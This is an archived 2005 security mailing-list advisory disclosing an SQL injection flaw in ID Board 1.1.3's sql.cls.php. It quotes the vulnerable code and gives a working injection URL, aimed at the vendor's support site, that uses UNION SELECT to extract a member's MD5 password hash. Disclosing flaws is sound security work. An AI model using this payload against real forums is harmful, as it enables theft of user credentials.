lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <A58DC6DA-0A03-4531-8040-F0C0299B7332@systemli.org>
Date: Sun Jul 10 10:47:34 2005
From: defa at systemli.org (Defa)
Subject: ID Board 1.1.3 SQL Injection Vulnerability

============================================================
Title: ID Board 1.1.3 SQL Injection Vulnerability
Vulnerability Discovery: me, myself and I
Date: 09/07/2005
Severity: Remote users can fetch MD5 Passwd Hash.
Affected version: 1.1.3 free (only one tested)
Vendor: http://www.id-team.com/
============================================================

============================================================

* Summary *

ID Board is a little Bulletin Board system. It is offered in three  
versions, I could only test the free one. Board is commonly used on  
german speaking websites.

-------------------------------------------------------------

* Problem Description *
-----------------------

The bug reside in sql.cls.php - the tbl_suff variable isn't checked.

Vulnerable Code:

if (!ereg("LEFT JOIN", $from) && !ereg(",", $from) &&
      !ereg("AS", $from))
$from = "[tbl_prev]".$from."[tbl_suff]";


* Example * (Account required)
------------------------------

http://support.id-team.com/index.php?site=warn&f=1%20WHERE%200=1% 
20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members% 
20WHERE%20mem_id=1/*&0&warn=0

-------------------------------------------------------------

* Fix *

  Contact the Vendor.

-------------------------------------------------------------

* References *

This mail.
-------------------------------------------------------------

* Credits *

no credit.
-------------------------------------------------------------

regards
defa

--
Don't eat yellow snow!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ